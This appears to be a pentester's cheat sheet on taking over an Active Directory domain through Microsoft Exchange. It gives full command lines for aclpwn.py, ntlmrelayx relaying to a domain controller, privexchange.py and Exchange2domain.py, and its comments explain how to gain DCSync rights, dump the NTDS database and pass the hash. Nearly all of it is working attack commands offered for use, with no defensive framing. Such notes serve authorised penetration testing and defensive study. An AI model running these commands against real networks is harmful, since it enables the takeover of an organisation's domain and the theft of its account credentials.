https://github.com/dirkjanm/PrivExchange
https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
https://chryzsh.github.io/exploiting-privexchange/
# After exploitation, you won't be like Domain Admin directly, so, you won't be able to connect to the# DC using Domain Admins rights.# Exploitation allows user to get DCSync privileges, which is enough to get the NTDS Database# You can then use Pass the Hash attack with administrators accounts to get real access
Aclpwn
# ACLpwn is a tool used to find compromission paths inside BloodHound data and to exploit them# BloodHound need to be running# Many options are available# Dry option is used to look for compromission without exploiting it
python aclpwn.py -f user@domain.com -ft user -d domain.com -u user -p password -sp password -du neo4j -dp password -dry
# Default, exploitation is started
python aclpwn.py -f user@domain.com -ft user -d domain.com -u user -p password -sp password -du neo4j -dp password
# You can restore previous privileges after exploitation
python aclpwn.py -r restore-file
ntlmrelayx / privexchange.py
# NTLM relaying is used to relay connexion and give DCSync privileges
ntlmrelayx.py -t ldap://s2016dc.testsegment.local --escalate-user ntu
# User need to have a mailbox to exploit this way# After a minute (which is the value supplied for the push notification) you can get results in ntlmrelayx
python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local
# You can also perform the attack without getting any credentials# Using the httpattack.py file# It uses NTLM Relaying with LLMNR / NBT-NS to relay captured credentials over the network
Exchange2domain
# All in One tools of privexchange# You only need to open the web server port, so no high privileges are required.# Many options available
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip